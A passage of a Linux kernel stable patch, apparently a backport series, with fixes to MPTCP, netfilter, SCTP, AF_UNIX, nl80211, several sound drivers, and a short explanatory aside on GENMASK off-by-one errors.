+ 			goto next;
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 414ed70e7ba2e..278ba5955dfd1 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -159,6 +159,24 @@ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry, true);
+ }
+ 
++bool mptcp_userspace_pm_is_backup(struct mptcp_sock *msk,
++				  struct mptcp_addr_info *skc)
++{
++	struct mptcp_pm_addr_entry *entry;
++	bool backup = false;
++
++	spin_lock_bh(&msk->pm.lock);
++	list_for_each_entry(entry, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, skc, false)) {
++			backup = !!(entry->flags & MPTCP_PM_ADDR_FLAG_BACKUP);
++			break;
++		}
++	}
++	spin_unlock_bh(&msk->pm.lock);
++
++	return backup;
++}
++
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index a2b85eebb620b..9e582725ccb41 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -618,6 +618,7 @@ void __mptcp_unaccepted_force_close(struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 			   const struct mptcp_addr_info *b, bool use_port);
++void mptcp_local_address(const struct sock_common *skc, struct mptcp_addr_info *addr);
+ 
+ /* called with sk socket lock held */
+ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+@@ -912,6 +913,9 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 			     struct mptcp_rm_list *rm_list);
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
++bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc);
++bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
++bool mptcp_userspace_pm_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ 
+ static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflow)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 96bdd4119578f..b47673b370279 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -99,6 +99,7 @@ static struct mptcp_sock *subflow_token_join_request(struct request_sock *req)
+ 		return NULL;
+ 	}
+ 	subflow_req->local_id = local_id;
++	subflow_req->request_bkup = mptcp_pm_is_backup(msk, (struct sock_common *)req);
+ 
+ 	return msk;
+ }
+@@ -165,6 +166,9 @@ static int subflow_check_req(struct request_sock *req,
+ 			return 0;
+ 	} else if (opt_mp_join) {
+ 		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINSYNRX);
++
++		if (mp_opt.backup)
++			SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINSYNBACKUPRX);
+ 	}
+ 
+ 	if (opt_mp_capable && listener->request_mptcp) {
+@@ -469,6 +473,9 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->mp_join = 1;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKRX);
+ 
++		if (subflow->backup)
++			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKBACKUPRX);
++
+ 		if (subflow_use_different_dport(mptcp_sk(parent), sk)) {
+ 			pr_debug("synack inet_dport=%d %d",
+ 				 ntohs(inet_sk(sk)->inet_dport),
+@@ -507,6 +514,8 @@ static int subflow_chk_local_id(struct sock *sk)
+ 		return err;
+ 
+ 	subflow_set_local_id(subflow, err);
++	subflow->request_bkup = mptcp_pm_is_backup(msk, (struct sock_common *)sk);
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d18b698139caf..10180d280e792 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3119,18 +3119,17 @@ static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
+ 	return ERR_PTR(err);
+ }
+ 
+-int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src)
++int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src, gfp_t gfp)
+ {
+ 	int err;
+ 
+-	if (src->ops->clone) {
+-		dst->ops = src->ops;
+-		err = src->ops->clone(dst, src);
+-		if (err < 0)
+-			return err;
+-	} else {
+-		memcpy(dst, src, src->ops->size);
+-	}
++	if (WARN_ON_ONCE(!src->ops->clone))
++		return -EINVAL;
++
++	dst->ops = src->ops;
++	err = src->ops->clone(dst, src, gfp);
++	if (err < 0)
++		return err;
+ 
+ 	__module_get(src->ops->type->owner);
+ 
+@@ -3516,6 +3515,15 @@ static void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *r
+ 	nf_tables_rule_destroy(ctx, rule);
+ }
+ 
++/** nft_chain_validate - loop detection and hook validation
++ *
++ * @ctx: context containing call depth and base chain
++ * @chain: chain to validate
++ *
++ * Walk through the rules of the given chain and chase all jumps/gotos
++ * and set lookups until either the jump limit is hit or all reachable
++ * chains have been validated.
++ */
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ {
+ 	struct nft_expr *expr, *last;
+@@ -3534,6 +3542,9 @@ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ 			if (!expr->ops->validate)
+ 				continue;
+ 
++			/* This may call nft_chain_validate() recursively,
++			 * callers that do so must increment ctx->level.
++			 */
+ 			err = expr->ops->validate(ctx, expr, &data);
+ 			if (err < 0)
+ 				return err;
+@@ -6060,7 +6071,7 @@ int nft_set_elem_expr_clone(const struct nft_ctx *ctx, struct nft_set *set,
+ 		if (!expr)
+ 			goto err_expr;
+ 
+-		err = nft_expr_clone(expr, set->exprs[i]);
++		err = nft_expr_clone(expr, set->exprs[i], GFP_KERNEL_ACCOUNT);
+ 		if (err < 0) {
+ 			kfree(expr);
+ 			goto err_expr;
+@@ -6099,7 +6110,7 @@ static int nft_set_elem_expr_setup(struct nft_ctx *ctx,
+ 
+ 	for (i = 0; i < num_exprs; i++) {
+ 		expr = nft_setelem_expr_at(elem_expr, elem_expr->size);
+-		err = nft_expr_clone(expr, expr_array[i]);
++		err = nft_expr_clone(expr, expr_array[i], GFP_KERNEL_ACCOUNT);
+ 		if (err < 0)
+ 			goto err_elem_expr_setup;
+ 
+@@ -10191,143 +10202,6 @@ int nft_chain_validate_hooks(const struct nft_chain *chain,
+ }
+ EXPORT_SYMBOL_GPL(nft_chain_validate_hooks);
+ 
+-/*
+- * Loop detection - walk through the ruleset beginning at the destination chain
+- * of a new jump until either the source chain is reached (loop) or all
+- * reachable chains have been traversed.
+- *
+- * The loop check is performed whenever a new jump verdict is added to an
+- * expression or verdict map or a verdict map is bound to a new chain.
+- */
+-
+-static int nf_tables_check_loops(const struct nft_ctx *ctx,
+-				 const struct nft_chain *chain);
+-
+-static int nft_check_loops(const struct nft_ctx *ctx,
+-			   const struct nft_set_ext *ext)
+-{
+-	const struct nft_data *data;
+-	int ret;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		ret = nf_tables_check_loops(ctx, data->verdict.chain);
+-		break;
+-	default:
+-		ret = 0;
+-		break;
+-	}
+-
+-	return ret;
+-}
+-
+-static int nf_tables_loop_check_setelem(const struct nft_ctx *ctx,
+-					struct nft_set *set,
+-					const struct nft_set_iter *iter,
+-					struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	return nft_check_loops(ctx, ext);
+-}
+-
+-static int nft_set_catchall_loops(const struct nft_ctx *ctx,
+-				  struct nft_set *set)
+-{
+-	u8 genmask = nft_genmask_next(ctx->net);
+-	struct nft_set_elem_catchall *catchall;
+-	struct nft_set_ext *ext;
+-	int ret = 0;
+-
+-	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+-		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_set_elem_active(ext, genmask))
+-			continue;
+-
+-		ret = nft_check_loops(ctx, ext);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	return ret;
+-}
+-
+-static int nf_tables_check_loops(const struct nft_ctx *ctx,
+-				 const struct nft_chain *chain)
+-{
+-	const struct nft_rule *rule;
+-	const struct nft_expr *expr, *last;
+-	struct nft_set *set;
+-	struct nft_set_binding *binding;
+-	struct nft_set_iter iter;
+-
+-	if (ctx->chain == chain)
+-		return -ELOOP;
+-
+-	list_for_each_entry(rule, &chain->rules, list) {
+-		nft_rule_for_each_expr(expr, last, rule) {
+-			struct nft_immediate_expr *priv;
+-			const struct nft_data *data;
+-			int err;
+-
+-			if (strcmp(expr->ops->type->name, "immediate"))
+-				continue;
+-
+-			priv = nft_expr_priv(expr);
+-			if (priv->dreg != NFT_REG_VERDICT)
+-				continue;
+-
+-			data = &priv->data;
+-			switch (data->verdict.code) {
+-			case NFT_JUMP:
+-			case NFT_GOTO:
+-				err = nf_tables_check_loops(ctx,
+-							data->verdict.chain);
+-				if (err < 0)
+-					return err;
+-				break;
+-			default:
+-				break;
+-			}
+-		}
+-	}
+-
+-	list_for_each_entry(set, &ctx->table->sets, list) {
+-		if (!nft_is_active_next(ctx->net, set))
+-			continue;
+-		if (!(set->flags & NFT_SET_MAP) ||
+-		    set->dtype != NFT_DATA_VERDICT)
+-			continue;
+-
+-		list_for_each_entry(binding, &set->bindings, list) {
+-			if (!(binding->flags & NFT_SET_MAP) ||
+-			    binding->chain != chain)
+-				continue;
+-
+-			iter.genmask	= nft_genmask_next(ctx->net);
+-			iter.skip 	= 0;
+-			iter.count	= 0;
+-			iter.err	= 0;
+-			iter.fn		= nf_tables_loop_check_setelem;
+-
+-			set->ops->walk(ctx, set, &iter);
+-			if (!iter.err)
+-				iter.err = nft_set_catchall_loops(ctx, set);
+-
+-			if (iter.err < 0)
+-				return iter.err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+ /**
+  *	nft_parse_u32_check - fetch u32 attribute and check for maximum value
+  *
+@@ -10440,7 +10314,7 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 		if (data != NULL &&
+ 		    (data->verdict.code == NFT_GOTO ||
+ 		     data->verdict.code == NFT_JUMP)) {
+-			err = nf_tables_check_loops(ctx, data->verdict.chain);
++			err = nft_chain_validate(ctx, data->verdict.chain);
+ 			if (err < 0)
+ 				return err;
+ 		}
+diff --git a/net/netfilter/nft_connlimit.c b/net/netfilter/nft_connlimit.c
+index d657f999a11b6..793994622b87d 100644
+--- a/net/netfilter/nft_connlimit.c
++++ b/net/netfilter/nft_connlimit.c
+@@ -209,12 +209,12 @@ static void nft_connlimit_destroy(const struct nft_ctx *ctx,
+ 	nft_connlimit_do_destroy(ctx, priv);
+ }
+ 
+-static int nft_connlimit_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_connlimit_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_connlimit *priv_dst = nft_expr_priv(dst);
+ 	struct nft_connlimit *priv_src = nft_expr_priv(src);
+ 
+-	priv_dst->list = kmalloc(sizeof(*priv_dst->list), GFP_ATOMIC);
++	priv_dst->list = kmalloc(sizeof(*priv_dst->list), gfp);
+ 	if (!priv_dst->list)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_counter.c b/net/netfilter/nft_counter.c
+index f4d3573e8782d..b5fe7fe4b60db 100644
+--- a/net/netfilter/nft_counter.c
++++ b/net/netfilter/nft_counter.c
+@@ -225,7 +225,7 @@ static void nft_counter_destroy(const struct nft_ctx *ctx,
+ 	nft_counter_do_destroy(priv);
+ }
+ 
+-static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_counter_percpu_priv *priv = nft_expr_priv(src);
+ 	struct nft_counter_percpu_priv *priv_clone = nft_expr_priv(dst);
+@@ -235,7 +235,7 @@ static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src)
+ 
+ 	nft_counter_fetch(priv, &total);
+ 
+-	cpu_stats = alloc_percpu_gfp(struct nft_counter, GFP_ATOMIC);
++	cpu_stats = alloc_percpu_gfp(struct nft_counter, gfp);
+ 	if (cpu_stats == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index a470e5f612843..953aba871f45c 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -35,7 +35,7 @@ static int nft_dynset_expr_setup(const struct nft_dynset *priv,
+ 
+ 	for (i = 0; i < priv->num_exprs; i++) {
+ 		expr = nft_setelem_expr_at(elem_expr, elem_expr->size);
+-		if (nft_expr_clone(expr, priv->expr_array[i]) < 0)
++		if (nft_expr_clone(expr, priv->expr_array[i], GFP_ATOMIC) < 0)
+ 			return -1;
+ 
+ 		elem_expr->size += priv->expr_array[i]->ops->size;
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index eaa54964cf23c..2ff387b649cfc 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -101,12 +101,12 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ 	kfree(priv->last);
+ }
+ 
+-static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
+ 	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+-	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
++	priv_dst->last = kzalloc(sizeof(*priv_dst->last), gfp);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 36ded7d43262c..a263596da99ac 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -150,7 +150,7 @@ static void nft_limit_destroy(const struct nft_ctx *ctx,
+ }
+ 
+ static int nft_limit_clone(struct nft_limit_priv *priv_dst,
+-			   const struct nft_limit_priv *priv_src)
++			   const struct nft_limit_priv *priv_src, gfp_t gfp)
+ {
+ 	priv_dst->tokens_max = priv_src->tokens_max;
+ 	priv_dst->rate = priv_src->rate;
+@@ -158,7 +158,7 @@ static int nft_limit_clone(struct nft_limit_priv *priv_dst,
+ 	priv_dst->burst = priv_src->burst;
+ 	priv_dst->invert = priv_src->invert;
+ 
+-	priv_dst->limit = kmalloc(sizeof(*priv_dst->limit), GFP_ATOMIC);
++	priv_dst->limit = kmalloc(sizeof(*priv_dst->limit), gfp);
+ 	if (!priv_dst->limit)
+ 		return -ENOMEM;
+ 
+@@ -222,14 +222,15 @@ static void nft_limit_pkts_destroy(const struct nft_ctx *ctx,
+ 	nft_limit_destroy(ctx, &priv->limit);
+ }
+ 
+-static int nft_limit_pkts_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_limit_pkts_clone(struct nft_expr *dst, const struct nft_expr *src,
++				gfp_t gfp)
+ {
+ 	struct nft_limit_priv_pkts *priv_dst = nft_expr_priv(dst);
+ 	struct nft_limit_priv_pkts *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->cost = priv_src->cost;
+ 
+-	return nft_limit_clone(&priv_dst->limit, &priv_src->limit);
++	return nft_limit_clone(&priv_dst->limit, &priv_src->limit, gfp);
+ }
+ 
+ static struct nft_expr_type nft_limit_type;
+@@ -280,12 +281,13 @@ static void nft_limit_bytes_destroy(const struct nft_ctx *ctx,
+ 	nft_limit_destroy(ctx, priv);
+ }
+ 
+-static int nft_limit_bytes_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_limit_bytes_clone(struct nft_expr *dst, const struct nft_expr *src,
++				 gfp_t gfp)
+ {
+ 	struct nft_limit_priv *priv_dst = nft_expr_priv(dst);
+ 	struct nft_limit_priv *priv_src = nft_expr_priv(src);
+ 
+-	return nft_limit_clone(priv_dst, priv_src);
++	return nft_limit_clone(priv_dst, priv_src, gfp);
+ }
+ 
+ static const struct nft_expr_ops nft_limit_bytes_ops = {
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index 410a5fcf88309..ef8e7cdbd0e6a 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -232,7 +232,7 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ 	return nft_quota_do_destroy(ctx, priv);
+ }
+ 
+-static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
+ 	struct nft_quota *priv_src = nft_expr_priv(src);
+@@ -240,7 +240,7 @@ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ 	priv_dst->quota = priv_src->quota;
+ 	priv_dst->flags = priv_src->flags;
+ 
+-	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
++	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), gfp);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+diff --git a/net/sctp/input.c b/net/sctp/input.c
+index 4f43afa8678f9..4ee9374dcfb92 100644
+--- a/net/sctp/input.c
++++ b/net/sctp/input.c
+@@ -748,15 +748,19 @@ static int __sctp_hash_endpoint(struct sctp_endpoint *ep)
+ 	struct sock *sk = ep->base.sk;
+ 	struct net *net = sock_net(sk);
+ 	struct sctp_hashbucket *head;
++	int err = 0;
+ 
+ 	ep->hashent = sctp_ep_hashfn(net, ep->base.bind_addr.port);
+ 	head = &sctp_ep_hashtable[ep->hashent];
+ 
++	write_lock(&head->lock);
+ 	if (sk->sk_reuseport) {
+ 		bool any = sctp_is_ep_boundall(sk);
+ 		struct sctp_endpoint *ep2;
+ 		struct list_head *list;
+-		int cnt = 0, err = 1;
++		int cnt = 0;
++
++		err = 1;
+ 
+ 		list_for_each(list, &ep->base.bind_addr.address_list)
+ 			cnt++;
+@@ -774,24 +778,24 @@ static int __sctp_hash_endpoint(struct sctp_endpoint *ep)
+ 			if (!err) {
+ 				err = reuseport_add_sock(sk, sk2, any);
+ 				if (err)
+-					return err;
++					goto out;
+ 				break;
+ 			} else if (err < 0) {
+-				return err;
++				goto out;
+ 			}
+ 		}
+ 
+ 		if (err) {
+ 			err = reuseport_alloc(sk, any);
+ 			if (err)
+-				return err;
++				goto out;
+ 		}
+ 	}
+ 
+-	write_lock(&head->lock);
+ 	hlist_add_head(&ep->node, &head->chain);
++out:
+ 	write_unlock(&head->lock);
+-	return 0;
++	return err;
+ }
+ 
+ /* Add an endpoint to the hash. Local BH-safe. */
+@@ -816,10 +820,9 @@ static void __sctp_unhash_endpoint(struct sctp_endpoint *ep)
+ 
+ 	head = &sctp_ep_hashtable[ep->hashent];
+ 
++	write_lock(&head->lock);
+ 	if (rcu_access_pointer(sk->sk_reuseport_cb))
+ 		reuseport_detach_sock(sk);
+-
+-	write_lock(&head->lock);
+ 	hlist_del_init(&ep->node);
+ 	write_unlock(&head->lock);
+ }
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index 6debf4fd42d4e..cef623ea15060 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -369,8 +369,10 @@ static void rpc_make_runnable(struct workqueue_struct *wq,
+ 	if (RPC_IS_ASYNC(task)) {
+ 		INIT_WORK(&task->u.tk_work, rpc_async_schedule);
+ 		queue_work(wq, &task->u.tk_work);
+-	} else
++	} else {
++		smp_mb__after_atomic();
+ 		wake_up_bit(&task->tk_runstate, RPC_TASK_QUEUED);
++	}
+ }
+ 
+ /*
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index db71f35b67b86..7d59f9a6c9046 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1461,6 +1461,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	struct unix_sock *u = unix_sk(sk), *newu, *otheru;
+ 	struct net *net = sock_net(sk);
+ 	struct sk_buff *skb = NULL;
++	unsigned char state;
+ 	long timeo;
+ 	int err;
+ 
+@@ -1505,7 +1506,6 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto out;
+ 	}
+ 
+-	/* Latch state of peer */
+ 	unix_state_lock(other);
+ 
+ 	/* Apparently VFS overslept socket death. Retry. */
+@@ -1535,37 +1535,21 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto restart;
+ 	}
+ 
+-	/* Latch our state.
+-
+-	   It is tricky place. We need to grab our state lock and cannot
+-	   drop lock on peer. It is dangerous because deadlock is
+-	   possible. Connect to self case and simultaneous
+-	   attempt to connect are eliminated by checking socket
+-	   state. other is TCP_LISTEN, if sk is TCP_LISTEN we
+-	   check this before attempt to grab lock.
+-
+-	   Well, and we have to recheck the state after socket locked.
++	/* self connect and simultaneous connect are eliminated
++	 * by rejecting TCP_LISTEN socket to avoid deadlock.
+ 	 */
+-	switch (READ_ONCE(sk->sk_state)) {
+-	case TCP_CLOSE:
+-		/* This is ok... continue with connect */
+-		break;
+-	case TCP_ESTABLISHED:
+-		/* Socket is already connected */
+-		err = -EISCONN;
+-		goto out_unlock;
+-	default:
+-		err = -EINVAL;
++	state = READ_ONCE(sk->sk_state);
++	if (unlikely(state != TCP_CLOSE)) {
++		err = state == TCP_ESTABLISHED ? -EISCONN : -EINVAL;
+ 		goto out_unlock;
+ 	}
+ 
+ 	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+-	if (sk->sk_state != TCP_CLOSE) {
++	if (unlikely(sk->sk_state != TCP_CLOSE)) {
++		err = sk->sk_state == TCP_ESTABLISHED ? -EISCONN : -EINVAL;
+ 		unix_state_unlock(sk);
+-		unix_state_unlock(other);
+-		sock_put(other);
+-		goto restart;
++		goto out_unlock;
+ 	}
+ 
+ 	err = security_unix_stream_connect(sk, other, newsk);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index a00df7b89ca86..214eee6105c7f 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3346,6 +3346,33 @@ static int __nl80211_set_channel(struct cfg80211_registered_device *rdev,
+ 			if (chandef.chan != cur_chan)
+ 				return -EBUSY;
+ 
++			/* only allow this for regular channel widths */
++			switch (wdev->links[link_id].ap.chandef.width) {
++			case NL80211_CHAN_WIDTH_20_NOHT:
++			case NL80211_CHAN_WIDTH_20:
++			case NL80211_CHAN_WIDTH_40:
++			case NL80211_CHAN_WIDTH_80:
++			case NL80211_CHAN_WIDTH_80P80:
++			case NL80211_CHAN_WIDTH_160:
++			case NL80211_CHAN_WIDTH_320:
++				break;
++			default:
++				return -EINVAL;
++			}
++
++			switch (chandef.width) {
++			case NL80211_CHAN_WIDTH_20_NOHT:
++			case NL80211_CHAN_WIDTH_20:
++			case NL80211_CHAN_WIDTH_40:
++			case NL80211_CHAN_WIDTH_80:
++			case NL80211_CHAN_WIDTH_80P80:
++			case NL80211_CHAN_WIDTH_160:
++			case NL80211_CHAN_WIDTH_320:
++				break;
++			default:
++				return -EINVAL;
++			}
++
+ 			result = rdev_set_ap_chanwidth(rdev, dev, link_id,
+ 						       &chandef);
+ 			if (result)
+@@ -4394,10 +4421,7 @@ static void get_key_callback(void *c, struct key_params *params)
+ 	struct nlattr *key;
+ 	struct get_key_cookie *cookie = c;
+ 
+-	if ((params->key &&
+-	     nla_put(cookie->msg, NL80211_ATTR_KEY_DATA,
+-		     params->key_len, params->key)) ||
+-	    (params->seq &&
++	if ((params->seq &&
+ 	     nla_put(cookie->msg, NL80211_ATTR_KEY_SEQ,
+ 		     params->seq_len, params->seq)) ||
+ 	    (params->cipher &&
+@@ -4409,10 +4433,7 @@ static void get_key_callback(void *c, struct key_params *params)
+ 	if (!key)
+ 		goto nla_put_failure;
+ 
+-	if ((params->key &&
+-	     nla_put(cookie->msg, NL80211_KEY_DATA,
+-		     params->key_len, params->key)) ||
+-	    (params->seq &&
++	if ((params->seq &&
+ 	     nla_put(cookie->msg, NL80211_KEY_SEQ,
+ 		     params->seq_len, params->seq)) ||
+ 	    (params->cipher &&
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index f460ac80c8e49..0ffacc779cd66 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1989,6 +1989,8 @@ static int hdmi_add_cvt(struct hda_codec *codec, hda_nid_t cvt_nid)
+ }
+ 
+ static const struct snd_pci_quirk force_connect_list[] = {
++	SND_PCI_QUIRK(0x103c, 0x83e2, "HP EliteDesk 800 G4", 1),
++	SND_PCI_QUIRK(0x103c, 0x83ef, "HP MP9 G4 Retail System AMS", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index edfcd38175d23..93d65a1acc475 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10173,6 +10173,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0009, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c438fccac8e98..b4a40a880035c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -381,6 +381,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A44"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 5b5b7c267a616..061c77d0cd45b 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1252,12 +1252,12 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 	pdev->prop.lane_control_support = true;
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	if (wcd->is_tx) {
+-		pdev->prop.source_ports = GENMASK(WCD938X_MAX_SWR_PORTS, 0);
++		pdev->prop.source_ports = GENMASK(WCD938X_MAX_SWR_PORTS - 1, 0);
+ 		pdev->prop.src_dpn_prop = wcd938x_dpn_prop;
+ 		wcd->ch_info = &wcd938x_sdw_tx_ch_info[0];
+ 		pdev->prop.wake_capable = true;
+ 	} else {
+-		pdev->prop.sink_ports = GENMASK(WCD938X_MAX_SWR_PORTS, 0);
++		pdev->prop.sink_ports = GENMASK(WCD938X_MAX_SWR_PORTS - 1, 0);
+ 		pdev->prop.sink_dpn_prop = wcd938x_dpn_prop;
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
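
The same off-by-one recurs in the wsa881x and wsa883x hunks below; as a quick
illustration (not part of the patch), GENMASK(h, l) from <linux/bits.h> sets
bits l..h inclusive, so an n-port bitmap needs GENMASK(n - 1, 0).

	static u32 port_mask(unsigned int n_ports)
	{
		/* n_ports == 4: returns 0xf; GENMASK(4, 0) would be 0x1f. */
		return GENMASK(n_ports - 1, 0);
	}
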
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 264ec05a3c675..054da9d2776cd 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1131,7 +1131,7 @@ static int wsa881x_probe(struct sdw_slave *pdev,
+ 	wsa881x->sconfig.frame_rate = 48000;
+ 	wsa881x->sconfig.direction = SDW_DATA_DIR_RX;
+ 	wsa881x->sconfig.type = SDW_STREAM_PDM;
+-	pdev->prop.sink_ports = GENMASK(WSA881X_MAX_SWR_PORTS, 0);
